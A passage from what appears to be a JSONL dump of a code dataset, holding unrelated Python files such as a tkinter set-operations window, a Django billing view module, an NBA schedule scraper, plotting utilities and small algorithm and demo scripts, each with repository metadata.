\"eslint-plugin-import\",\n \"eslint-plugin-n\",\n \"eslint-plugin-promise\",\n ],\n dev=True,\n )\n write_file(\n \".eslintrc.js\",\n \"\"\"module.exports = {\n env: {\n browser: true,\n es2021: true,\n node: true,\n },\n extends: ['airbnb', 'airbnb-typescript'],\n overrides: [],\n parserOptions: {\n ecmaVersion: 'latest',\n sourceType: 'module',\n project: './tsconfig.json',\n },\n rules: {},\n};\n\"\"\",\n )\n\n write_file(\n \".prettierrc\",\n \"\"\"{\n \"printWidth\": 100,\n \"singleQuote\": true,\n \"trailingComma\": \"all\"\n}\n\"\"\",\n )\n\n\nif __name__ == \"__main__\":\n project_dir = os.path.expanduser(r\"{{JS_PROJECT_DIR}}\")\n cd(project_dir)\n print(\"Project dir: %s\" % project_dir)\n\n copy(TEMPLATE_DIR + \"/LICENSE\", \"LICENSE\", overwrite=False)\n\n menu.exec()\n","sub_path":"scripts/r/web/js_tools.py","file_name":"js_tools.py","file_ext":"py","file_size_in_byte":12972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"360645523","text":"from tkinter import *\nimport fifthwindow\n\nclass Window3(Tk):\n\n def __init__(self):\n super().__init__()\n self.geometry(\"1000x350\")\n self.title(\"Third window\")\n\n #x = (self.winfo_screenwidth() - self.winfo_reqwidth()) / 2\n #y = (self.winfo_screenheight() - self.winfo_reqheight()) / 2\n #self.wm_geometry(\"+%d+%d\" % (x, y))\n\n def start(event):\n try:\n Window3.d = (Window3.setA | Window3.setB) ^ Window3.setC\n txt_result.insert(\"3.3\", Window3.d)\n fifthwindow.Window5.D2 = Window3.d\n except AttributeError:\n txt_result.delete(\"1.0\", END)\n txt_result.insert(\"1.0\", \"Аргумент не був знайдений\")\n\n def save(event):\n with open(r\"result3.txt\", \"w\") as f:\n try:\n f.write(\"D2 : \" + str(Window3.d))\n except AttributeError:\n f.write(\"Результат відсутній\")\n\n txtA = Text(self,height=4, width=200, wrap=WORD)\n txtB = Text(self,height=4, width=200, wrap=WORD)\n txtC = Text(self,height=4, width=200, wrap=WORD)\n lbl_lbl = Label(self, text=\"Результат:\", width=10)\n txt_result = Text(self, height=4, width=100, wrap=WORD)\n btn_res = Button(self, text=\"Розрахувати\")\n btn_res.bind(\"\", start)\n btn_save = Button(self, text=\"Зберегти\")\n btn_save.bind(\"\", save)\n\n try:\n txtA.insert(\"1.0\", Window3.setA)\n except AttributeError:\n txtA.delete(\"1.0\", END)\n txtA.insert(\"1.0\", \"Множина А: \"+\"Значення не знайдене\")\n try:\n txtB.insert(\"1.0\", Window3.setB)\n except AttributeError:\n txtB.delete(\"1.0\", END)\n txtB.insert(\"1.0\", \"Множина B: \"+\"Значення не знайдене\")\n try:\n txtC.insert(\"1.0\", Window3.setC)\n except AttributeError:\n txtC.delete(\"1.0\", END)\n txtC.insert(\"1.0\", \"Множина А: \"+\"Значення не знайдене\")\n txt_result.insert(\"1.0\", \"D2 = (AvВ)ΔC : \")\n\n txtA.grid(row=0, columnspan=3)\n txtB.grid(row=1, columnspan=3)\n txtC.grid(row=2, columnspan=3)\n lbl_lbl.grid(row=3, column=0, sticky=\"w\")\n txt_result.grid(row=5, columnspan=2)\n btn_res.grid(row=6, sticky=\"e\")\n btn_save.grid(sticky=\"w\")\n\n\nif __name__ == \"__main__\":\n root = Window3()\n root.mainloop()\n","sub_path":"lab1/thirdwindow.py","file_name":"thirdwindow.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203405374","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom config import *\nimport sqlite3\nfrom app import db\nfrom models import Slides\n\nengine = create_engine(Config.SQLALCHEMY_DATABASE_URI, echo=True)\nprint(Config.SQLALCHEMY_DATABASE_URI)\nSession = sessionmaker(bind=engine)\nsession = Session()\n\ndef recreate_database():\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n\ndef loadpgsql():\n conn = sqlite3.connect('all_slides.db')\n c = conn.cursor()\n c.execute(\"select * from slides\")\n records = c.fetchall()\n properties = {}\n print(Slides.query.all())\n\n for row in records:\n i = 0\n slide = Slides()\n for key in c.description:\n if key[0].title() == \"Filename\" :\n slide.filename = row[i]\n if key[0].title() == \"Number\" :\n slide.number = row[i]\n if key[0].title() == \"Genus\" :\n slide.genus = row[i]\n if key[0].title() == \"Species\" :\n slide.species = row[i]\n if key[0].title() == \"Stain\" :\n slide.stain = row[i]\n if key[0].title() == \"Accession_Number\" :\n slide.accession_number = row[i]\n if key[0].title() == \"Source\" :\n slide.source = row[i]\n if key[0].title() == \"Contributor\" :\n slide.contributor = row[i]\n if key[0].title() == \"Processing\" :\n slide.processing = row[i]\n if key[0].title() == \"Comments\" :\n slide.comments = row[i]\n if key[0].title() == \"Date_Sent_To_Aperio\" :\n slide.date_sent_to_aperio = row[i]\n if key[0].title() == \"Date_Collected\" :\n slide.date_collected = row[i]\n if key[0].title() == \"Date_Received\" :\n slide.date_received = row[i]\n if key[0].title() == \"Sample\" :\n slide.sample = row[i]\n if key[0].title() == \"Infect\" :\n slide.infect = row[i]\n if key[0].title() == \"Study\" :\n slide.study = row[i]\n if key[0].title() == \"Collection_Site\" :\n slide.collection_site = row[i]\n if key[0].title() == \"Histopathologic_Description\" :\n slide.histopathologic_description = row[i]\n if key[0].title() == \"Attachment\" :\n slide.attachment = row[i]\n\n properties[key[0].title()] = row[i]\n i = i + 1\n db.session.add(slide)\n db.session.commit()\n db.session.flush()\n conn.close()\n print(Slides.query.all())\n\ndb.session.close()\n\nloadpgsql()","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"511877399","text":"# 56. Merge Intervals\n#\n# Given a collection of intervals, merge all overlapping intervals.\n#\n# For example,\n# Given [1,3],[2,6],[8,10],[15,18],\n# return [1,6],[8,10],[15,18].\n\n\n# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n if not intervals:\n return []\n intervals.sort(key=lambda x: x.start)\n result = []\n curr = Interval(intervals[0].start, intervals[0].end)\n for inter in intervals:\n if inter.start > curr.end:\n result.append([curr.start, curr.end])\n curr.start = inter.start\n curr.end = max(curr.end, inter.end)\n result.append([curr.start, curr.end])\n return result","sub_path":"python/056_merge_intervals.py","file_name":"056_merge_intervals.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385566111","text":"# This file is a part of Fedora Tagger\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n#\n# Refer to the README.rst and LICENSE files for full details of the license\nimport tw2.core as twc\nfrom tw2.jqplugins.ui import DialogWidget\n\nimport codecs\nimport docutils.examples\n\n\ndef hotkeys_readme():\n \"\"\" Pick the README.rst off of disk and render the hotkeys section \"\"\"\n\n root = '/'.join(__file__.split('/')[:-4])\n fname = root + '/README.rst'\n with codecs.open(fname, 'r', 'utf-8') as f:\n rst = f.read()\n hotkeys = rst.split('.. hotkeys')[1]\n return docutils.examples.html_body(hotkeys)\n\n\nclass HotkeysDialog(DialogWidget):\n \"\"\" jQuery UI dialog for the hotkeys help. \"\"\"\n\n id = 'hotkeys_dialog'\n options = {\n 'title': 'Hotkeys',\n 'autoOpen': False,\n 'width': 550,\n }\n value = hotkeys_readme()\n\n\nsearch_action_js = twc.JSLink(link=\"javascript/search.js\")\n\nclass SearchDialog(DialogWidget):\n \"\"\" jQuery UI dialog for the searchbar. \"\"\"\n\n id = 'search_dialog'\n resources = DialogWidget.resources + [search_action_js]\n options = {\n 'title': 'Search for a package',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n value = \"\"\"\"\"\"\n\nadd_js = twc.JSLink(link=\"javascript/add.js\")\n\nclass AddTagDialog(DialogWidget):\n \"\"\" jQuery UI dialog for adding a new tag. \"\"\"\n\n id = 'add_dialog'\n resources = DialogWidget.resources + [add_js]\n options = {\n 'title': 'Add new tags (comma-separated)',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n value = \"\"\"
Press Enter to save tag
\"\"\"\n\nclass LeaderboardDialog(DialogWidget):\n \"\"\" jQuery UI dialog for showing the leaderboard. \"\"\"\n\n id = 'leaderboard_dialog'\n options = {\n 'title': 'Leaderboard',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n\nclass StatisticsDialog(DialogWidget):\n \"\"\" jQuery UI dialog for showing the statistics. \"\"\"\n\n id = 'statistics_dialog'\n options = {\n 'title': 'Statistics',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n","sub_path":"fedoratagger/frontend/widgets/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"471922177","text":"class Solution(object):\n def numIslands(self, grid):\n \"\"\"\n :type grid: List[List[str]]\n :rtype: int\n \"\"\"\n def dfs(x,y):\n grid[x][y]='A'\n if x-1>=0 and grid[x-1][y]=='1':\n dfs(x-1,y)\n if y-1>=0 and grid[x][y-1]=='1':\n dfs(x,y-1)\n if x+1 0:\n invoices = InvoiceForPayment.objects.filter(abon=abon, status=False)\n for inv in invoices:\n if inv.kilovats > 0 and abon.ballance > 0:\n\n prev_inv = inv.get_previous_by_date_create()\n kilovats = inv.kilovats - prev_inv.kilovats\n\n # есть неоплаченные киловаты: можно оплатить\n amount = TariffMan().calc_amount(abon, kilovats)\n abon.make_pay(kernel_user, amount)\n inv.set_ok()\n inv.save()\n abon.save()\n return HttpResponse('ok')\n\n\n@login_required\n@permission_required('abonapp.add_invoiceforpayment')\ndef add_invoice(request, uid):\n uid = mydefs.safe_int(uid)\n abon = get_object_or_404(Abon, id=uid)\n\n if request.method == 'POST':\n curr_kilovats = mydefs.safe_int(request.POST.get('curr_kilovats'))\n\n newinv = InvoiceForPayment()\n newinv.abon = abon\n newinv.kilovats = curr_kilovats\n\n if request.POST.get('status') == u'on':\n newinv.status = True\n\n newinv.tarif_pay = abon.current_tariff\n newinv.author = request.user\n newinv.save()\n return redirect('abonhome_link', uid=uid)\n else:\n return render(request, 'abonapp/addInvoice.html', {\n 'csrf_token': csrf(request)['csrf_token'],\n 'abon': abon,\n 'invcount': InvoiceForPayment.objects.filter(abon=abon).count()\n })\n\n\n@login_required\ndef log_page(request):\n return render(request, 'abonapp/log.html', {\n 'logs': AbonPayLog.objects.all()\n })\n","sub_path":"abonapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"619379616","text":"import logging\n\nfrom control.VKHelper import helperInstance\n\nlogging.basicConfig(filemode=\"w\", filename=\"jaba.log\", level=logging.INFO)\n\nlog = logging.getLogger()\n\n\ndef error(error_str):\n helperInstance.write_msg(error_str)\n log.error(error_str)\n","sub_path":"Utils/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"254456234","text":"\"\"\"\nvisualize how validation loss and acceptance probability\nchange with different lambda values (lambda = do no harm regularization)\n\"\"\"\nimport sys\nimport argparse\nimport logging\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\n\nfrom common import load_model, pickle_to_file, pickle_from_file, process_params, is_within_interval, get_normal_ci\n\ndef parse_args(args):\n ''' parse command line arguments '''\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('--seed',\n type=int,\n default=0)\n parser.add_argument('--num-test',\n type=int,\n default=100)\n parser.add_argument('--data-split-file',\n type=str,\n default=\"_output/data_split.pkl\")\n parser.add_argument('--data-file',\n type=str,\n default=\"_output/data.pkl\")\n parser.add_argument('--fitted-files',\n type=str,\n default=\"_output/fitted.pkl\",\n help=\"comma separated\")\n parser.add_argument('--plot-val-loss-file',\n type=str,\n default=\"_output/plot_lambda.png\")\n parser.add_argument('--plot-support-val-loss-file',\n type=str,\n default=\"_output/plot_support_unif_lambda.png\")\n parser.add_argument('--plot-accept-region-file',\n type=str,\n default=\"_output/plot_accept_region_lambda.png\")\n parser.add_argument('--plot-accept-file',\n type=str,\n default=\"_output/plot_accept_lambda.png\")\n parser.add_argument('--plot-support-accept-file',\n type=str,\n default=\"_output/plot_accept_unif_lambda.png\")\n parser.set_defaults()\n args = parser.parse_args()\n args.fitted_files = process_params(args.fitted_files, str)\n return args\n\ndef plot_accepted_vs_density(data_dict, fitted_models, args, mesh_size=0.05):\n \"\"\"\n Plot acceptance probability. Last row plot pdf of X\n \"\"\"\n COLORS = ['yellow', 'orange', 'red', 'green']\n LINESTYLES = ['solid', 'dashed', 'dotted', 'dashdot']\n\n num_models = len(fitted_models)\n # Look at the region we accepted\n test_x = data_dict[\"support_sim_settings\"].support_unif_rvs(args.num_test)\n x_pdf = data_dict[\"data_gen\"].get_x_pdf(test_x)\n\n all_pred_dfs = []\n for fitted_model in fitted_models:\n x_accept_probs = fitted_model.get_accept_prob(test_x)\n pred_df = pd.DataFrame({\"log_density\": np.log(x_pdf)})\n pred_df[\"accept\"] = x_accept_probs.ravel()\n pred_df[\"do_no_harm\"] = fitted_model.do_no_harm_param\n all_pred_dfs.append(pred_df)\n\n plt.clf()\n all_pred_dfs = pd.concat(all_pred_dfs)\n sns.lmplot(x=\"accept\", y=\"log_density\", hue=\"do_no_harm\", data=all_pred_dfs, lowess=True, scatter=False)\n plt.savefig(args.plot_accept_region_file)\n\ndef plot_accepted_rejected_region(data_dict, fitted_models, args, mesh_size=0.05):\n \"\"\"\n Plot acceptance probability. Last row plot pdf of X\n \"\"\"\n COLORS = ['yellow', 'orange', 'red', 'green']\n LINESTYLES = ['solid', 'dashed', 'dotted', 'dashdot']\n\n num_models = len(fitted_models)\n # Look at the region we accepted\n mesh_coords, (xx, yy) = data_dict[\"support_sim_settings\"].generate_grid(mesh_size)\n x_pdf = data_dict[\"data_gen\"].get_x_pdf(mesh_coords)\n all_accept_probs = []\n for fitted_model in fitted_models:\n x_accept_probs = fitted_model.get_accept_prob(mesh_coords)\n all_accept_probs.append(x_accept_probs)\n\n fig, ax = plt.subplots(nrows=1, figsize=(4,4))\n for idx, x_accept_probs in enumerate(all_accept_probs):\n print(\"MIN ACC\", np.min(x_accept_probs))\n cs = ax.contour(\n xx,\n yy,\n x_accept_probs.reshape(xx.shape),\n levels=[0.99],\n colors=COLORS[idx],\n linestyles=LINESTYLES[idx],\n linewidths=4)\n ax.clabel(cs, inline=1, fontsize=10, fmt=str(fitted_models[idx].do_no_harm_param))\n cs = ax.contourf(xx, yy, x_pdf.reshape(xx.shape), cmap='gray')\n cbar = fig.colorbar(cs, ax=ax)\n cbar.ax.tick_params(labelsize=18)\n ax.tick_params(axis='both', which='major', labelsize=18)\n plt.savefig(args.plot_accept_region_file)\n\n\ndef plot_validation_losses(fitted_models, data, args):\n validation_losses = []\n lambdas = []\n for fitted_model in fitted_models:\n validation_loss = -fitted_model.score(data.x, data.y)\n validation_losses.append(validation_loss)\n lambdas.append(fitted_model.do_no_harm_param)\n\n print(\"loss argmin\", np.argmin(validation_losses))\n print(\"val loss\", validation_losses)\n plt.clf()\n sns.regplot(\n lambdas,\n validation_losses,\n fit_reg=False)\n #plt.xscale(\"log\")\n #plt.yscale(\"log\")\n plt.savefig(args.plot_val_loss_file)\n\ndef plot_validation_losses_support_unif(\n fitted_models,\n support_sim_settings,\n data_gen,\n args):\n sim_support_x = support_sim_settings.support_unif_rvs(args.num_test)\n support_unif_data = data_gen.create_data_given_x(sim_support_x)\n\n validation_losses = []\n lambdas = []\n for fitted_model in fitted_models:\n validation_loss = -fitted_model.score(support_unif_data.x, support_unif_data.y)\n validation_losses.append(validation_loss)\n lambdas.append(fitted_model.do_no_harm_param)\n\n print(\"unif loss argmin\", np.argmin(validation_losses))\n print(\"unif val loss\", validation_losses)\n plt.clf()\n sns.regplot(\n lambdas,\n validation_losses,\n fit_reg=False)\n #plt.xscale(\"log\")\n #plt.yscale(\"log\")\n plt.savefig(args.plot_support_val_loss_file)\n\ndef plot_accept_probs(\n fitted_models,\n data,\n args):\n all_accept_probs = []\n lambdas = []\n for fitted_model in fitted_models:\n accept_probs = fitted_model.get_accept_prob(data.x)\n all_accept_probs.append(np.mean(accept_probs))\n lambdas.append(fitted_model.do_no_harm_param)\n\n print(\"accept\", all_accept_probs)\n plt.clf()\n sns.regplot(\n lambdas,\n all_accept_probs,\n fit_reg=False)\n #plt.xscale(\"log\")\n plt.savefig(args.plot_accept_file)\n\ndef plot_accept_probs_support_unif(\n fitted_models,\n support_sim_settings,\n data_gen,\n args):\n sim_support_x = support_sim_settings.support_unif_rvs(args.num_test)\n\n all_accept_probs = []\n lambdas = []\n for fitted_model in fitted_models:\n accept_probs = fitted_model.get_accept_prob(sim_support_x)\n all_accept_probs.append(np.mean(accept_probs))\n lambdas.append(fitted_model.do_no_harm_param)\n print(\"lambdas\", lambdas)\n print(\"uniform accept\", all_accept_probs)\n plt.clf()\n sns.regplot(\n lambdas,\n all_accept_probs,\n fit_reg=False)\n #plt.xscale(\"log\")\n plt.savefig(args.plot_support_accept_file)\n\ndef main(args=sys.argv[1:]):\n args = parse_args(args)\n np.random.seed(args.seed)\n\n # Read all data\n orig_data_dict = pickle_from_file(args.data_file)\n # Get the appropriate datasplit\n split_dict = pickle_from_file(args.data_split_file)\n recalib_data = orig_data_dict[\"train\"].subset(split_dict[\"recalibrate_idxs\"])\n args.num_p = recalib_data.x.shape[1]\n\n # Load models\n fitted_models = [load_model(fitted_file) for fitted_file in args.fitted_files]\n\n # Do all the plotting\n if args.num_p == 2:\n plot_accepted_rejected_region(orig_data_dict, fitted_models, args)\n else:\n plot_accepted_vs_density(orig_data_dict, fitted_models, args)\n #plot_validation_losses(fitted_models, recalib_data, args)\n #plot_validation_losses_support_unif(\n # fitted_models,\n # orig_data_dict[\"support_sim_settings\"],\n # orig_data_dict[\"data_gen\"],\n # args)\n #plot_accept_probs(fitted_models, recalib_data, args)\n #plot_accept_probs_support_unif(\n # fitted_models,\n # orig_data_dict[\"support_sim_settings\"],\n # orig_data_dict[\"data_gen\"],\n # args)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"plot_simulation_do_no_harm.py","file_name":"plot_simulation_do_no_harm.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417271163","text":"# -*- coding: utf-8 -*-\r\n###\r\n### Created on Tue Jul 23 10:34:10 2019\r\n\r\n### @author: AUy\r\n###\r\n\r\n# -*- coding: utf-8 -*-\r\n###\r\n### Created on Wed Jun 26 09:49:41 2019\r\n\r\n### @author: AUy\r\n###\r\n\r\nfrom requests import get\r\nfrom requests.exceptions import RequestException\r\nfrom contextlib import closing\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\ndef simple_get(url):\r\n###\r\n### Attempts to get the content at `url` by making an HTTP GET request.\r\n### If the content-type of response is some kind of HTML/XML, return the\r\n### text content, otherwise return None.\r\n###\r\n try:\r\n with closing(get(url, stream=True)) as resp:\r\n if is_good_response(resp):\r\n return resp.content\r\n else:\r\n return None\r\n\r\n except RequestException as e:\r\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\r\n return None\r\n\r\n\r\ndef is_good_response(resp):\r\n###\r\n### Returns True if the response seems to be HTML, False otherwise.\r\n###\r\n content_type = resp.headers['Content-Type'].lower()\r\n return (resp.status_code == 200 \r\n and content_type is not None \r\n and content_type.find('html') > -1)\r\n\r\n\r\ndef log_error(e):\r\n \r\n### It is always a good idea to log errors. / \r\n### This function just prints them, but you can /\r\n### make it do anything.\r\n\r\n print(f'could not find {e}')\r\n\r\ndef get_nba_tags():\r\n nba_team_html = simple_get('http://www.basketball-reference.com')\r\n nba_team_soup = BeautifulSoup(nba_team_html, 'html.parser')\r\n \r\n conf = ['E','W']\r\n nba_all = []\r\n for item in conf:\r\n nba_active = nba_team_soup.find(lambda tag: tag.name=='table' and tag.has_attr('id') and tag['id']==f'confs_standings_{item}')\r\n\r\n# nba_active = nba_team_soup.find(lambda tag: tag.name=='table' and tag.has_attr('id') and tag['id']==f'confs_standings_W') ### test line for correct table on main page\r\n\r\n nba_active_full = nba_active.find_all(lambda tag: tag.name=='th' and tag.has_attr('data-stat') and tag['data-stat']=='team_name')\r\n\r\n abr_list = []\r\n for row in nba_active_full[1:]:\r\n abr = row.a.text[0:]\r\n abr_list.append(abr)\r\n nba_all.append(abr_list)\r\n nba_teams = nba_all[0] + nba_all[1] \r\n return nba_teams \r\n\r\n\r\n\r\n# extract team schedule\r\ndef get_nba_schedule(url,team,season):\r\n c_list = [url, team, season]\r\n# c_list = ['www.basketball-reference.com', 'MIN', '2019'] ##### TEST VALUES. MAKE SURE TO REPLACE WITH ACTUAL VARIABLE!!! ########\r\n for item in c_list:\r\n str(item)\r\n# team = 'MIN' ##### Test step for adding home value to web list\r\n raw_html = simple_get(f'http://{c_list[0]}/teams/{c_list[1]}/{c_list[2]}_games.html')\r\n if raw_html is not None:\r\n raw_html_parse = BeautifulSoup(raw_html, 'html.parser')\r\n link_str = raw_html_parse.select('td') #make list \r\n# print(link_str) ####Step 1 check \r\n link_li_d, link_li_t, link_li_l, link_li_opp = [[] for i in range(4)] #make empty list\r\n link_list = [link_li_d, link_li_t, link_li_l, link_li_opp] #list of lists\r\n data_stat_name = ['date_game','game_start_time','game_location','opp_name'] #####!!!!! these are the indicators when filtering to the 'td' tag (e.g. data-stat=''))\r\n \r\n for item in range(len(link_list)):\r\n for td in link_str:\r\n if td['data-stat'] == data_stat_name[item]:\r\n link_list[item].append(td.text)\r\n\r\n\r\n opp_abr = raw_html_parse.find(lambda tag: tag.name=='table' and tag.has_attr('id') and tag['id']=='games') ###this to pull abbreviations for team names\r\n opp_abr_team_html = opp_abr.find_all(lambda tag: tag.name=='td' and tag.has_attr('data-stat') and tag['data-stat']=='opp_name')\r\n opp_abr_list = []\r\n for item in opp_abr_team_html:\r\n ol2 = item.find('a')['href']\r\n opp_abr_list.append(ol2)\r\n opp_df = pd.DataFrame(opp_abr_list, columns=['team_html'])\r\n opp_df_breakout = opp_df['team_html'].str.split('/',expand=True)\r\n opp_df['team_abr'] = opp_df_breakout.iloc[:,2]\r\n opp_df['home_abr'] = team\r\n link_li_table = list(zip(opp_df['home_abr'], link_li_d, link_li_t, link_li_l, link_li_opp, opp_df['team_abr']))\r\n\r\n# print(link_li_table) ##### Step 2 Check \r\n# return link_li_table ##### Step 2 \r\n ########DATAFRAME HERE##########\r\n link_df = pd.DataFrame(link_li_table) \r\n headers = link_df.columns = ['home_abr','date','time','location','opponent','opp_abr'] # renamed columns\r\n \r\n #### DATE PARSING################\r\n link_df['date'].replace(' ','')\r\n link_df[['weekday','month_day','year']] = link_df['date'].str.split(',', expand=True) #split date column\r\n link_df['date_squish'] = link_df['date'].str.strip() # split month_day column\r\n \r\n ########## DATE MODIFICATION###################\r\n date_breakout = link_df['date'].str.split(' ', expand=True)\r\n headers_date_breakout = date_breakout.columns = ['weekday','month', 'day', 'year']\r\n date_breakout_weekday = date_breakout['weekday'].str.replace(',','') #remove comma in weekday\r\n date_breakout_day = date_breakout['day'].str.replace(',','') #remove comma in day\r\n date_breakout['weekday'] = date_breakout_weekday ##### add to date series ##### YOU CAN CONSOLIDATE THIS LINE\r\n date_breakout['day'] = date_breakout_day #### add to date series ##### YOU CAN CONSOLIDATE THIS LINE \r\n date_breakout['date2'] = date_breakout['month'] + ' ' + date_breakout['day'] + ' ' + date_breakout['year']\r\n \r\n date_breakout['date2'] = [datetime.strptime(m, '%b %d %Y') for m in date_breakout['date2']]\r\n\r\n link_df['date2'] = date_breakout['date2'] # ADD TO DATAFRAME .\r\n \r\n# hm_gm_list = [row + 1 for row in link_df.iloc[:,0]]\r\n \r\n# link_df['hm_gm_index'] = link_df.reset_index() ####!!GIVES ERROR!!###### ValueError when trying to reset index to have home game count\r\n\r\n link_df_1 = link_df[link_df['location']==''].loc[:,['home_abr','opponent','opp_abr','weekday','date2','time']] ##### FINAL DATAFRAME #####\r\n\r\n test_n = []\r\n for n in range(len(link_df_1)):\r\n n += 1\r\n test_n.append(n)\r\n \r\n link_df_1['home_game_nm'] = test_n\r\n\r\n# print(link_df_1) ### validation step for final dataframe\r\n \r\n return link_df_1\r\n else:\r\n log_error(raw_html)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import time\r\n site = 'www.basketball-reference.com'\r\n team_abr = get_nba_tags()\r\n year = str(input('Enter season: '))\r\n \r\n start = time.time()\r\n print('Retreiving team lists...')\r\n \r\n nba = []\r\n [nba.append(get_nba_schedule(site,item,year)) for item in team_abr] \r\n \r\n nba_df = [pd.DataFrame(obj) for obj in nba]\r\n nba_con = pd.concat(nba_df) \r\n\r\n end = time.time()\r\n print('time elapsed: % seconds' % (end - start))\r\n\r\n \r\n print(nba_con) \r\n\r\n decision = ['y','n']\r\n\r\n while True:\r\n export = input(\"would you like to export this file? ('y' for yes/'n' for no) - \") #export process\r\n\r\n \r\n if export == decision[0]:\r\n nba_con.to_csv(f'C:\\\\Users\\\\AUy\\\\Downloads\\\\nba schedule_{year}.csv', index_label='Reg Season Game #')\r\n print(f'saved to filepath C:\\\\Users\\\\AUy\\\\Downloads\\\\ as \"nba schedule_{year}.csv\"')\r\n print('END')\r\n break\r\n elif export == decision[1]: \r\n print('file not saved')\r\n print('END')\r\n break\r\n elif export is None:\r\n print('Value must be entered. Please try again')\r\n export = None\r\n else:\r\n print('Value not recognized. Make sure to use lower case for \"y\" or \"n\" Please try again.')\r\n export = None \r\n \r\n\r\n \r\n \r\n\r\n","sub_path":"msal2.py","file_name":"msal2.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"165828391","text":"from inter.interkeys import HTTP\nimport inspect\n\nhttp=HTTP('w')\n# 从http这个实例对象里面获取到post这个属性或者方法\n# func等价于http.post\nfunc=getattr(http,'post')\n# 获取参数列表\ns=inspect.getfullargspec(func).__str__()\nprint(s)\ns=s[s.find('args=')+5:s.find(', varargs')]\ns=eval(s)\ns.remove('self')\nprint(s)","sub_path":"test_fanshe.py","file_name":"test_fanshe.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"492414384","text":"import multiprocessing\r\nimport time\r\nfrom multiprocessing import Queue\r\nimport os\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument('-ignore-certificate-errors')\r\nbrowser = webdriver.Chrome(options=options)\r\n\r\n\r\nclass MultProcess(multiprocessing.Process):\r\n def __init__(self, Que: Queue):\r\n multiprocessing.Process.__init__(self)\r\n self.Que = Que\r\n\r\n def run(self):\r\n while not self.Que.empty():\r\n # print(self.Que.get(), os.getpid())\r\n browser.get(self.Que.get())\r\n\r\n\r\nif __name__ == '__main__':\r\n time_start = time.time()\r\n queue1 = Queue()\r\n # for i in range(2000):\r\n # queue1.put(i)\r\n queue1.put(\"https://www.baidu.com/\")\r\n queue1.put(\"http://www.cctv.com/\")\r\n queue1.put(\"http://www.people.com.cn/\")\r\n queue1.put(\"https://xiaoyouxi.360.cn/?src=youxi\")\r\n queue1.put(\"https://www.ctrip.com/?allianceid=1328&sid=1643\")\r\n queue1.put(\"https://p4psearch.1688.com/\")\r\n queue1.put(\"https://www.tmall.com/\")\r\n queue1.put(\"https://nj.58.com//\")\r\n queue1.put(\"https://zonghe.hao.360.cn/#cid=youlike?\")\r\n\r\n p = MultProcess(queue1)\r\n w = MultProcess(queue1)\r\n e = MultProcess(queue1)\r\n p.start()\r\n w.start()\r\n e.start()\r\n # p.join()\r\n # w.join()\r\n # e.join()\r\n time_end = time.time()\r\n print(time_end - time_start)\r\n","sub_path":"Multiprocessing_learn.py","file_name":"Multiprocessing_learn.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"626013878","text":"import subprocess\nimport os\nimport uuid\nimport pickle\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport sys\nimport random\n\n# Fix RNG for reproducibility\nRANDOM_SEED = \"332021\"\nrandom.seed(RANDOM_SEED)\n\n# Training parameters\nNUM_LAYERS = 6\nNUM_HEADS = 8\nTRANSFORMER_FF = 2048\nBATCH_SIZE = 256\nRNN_SIZE = 512\nWORD_VEC_SIZE = 512\nVALID_BATCH_SIZE = 8\nACCUM_COUNT = 4\nLEARNING_RATE = 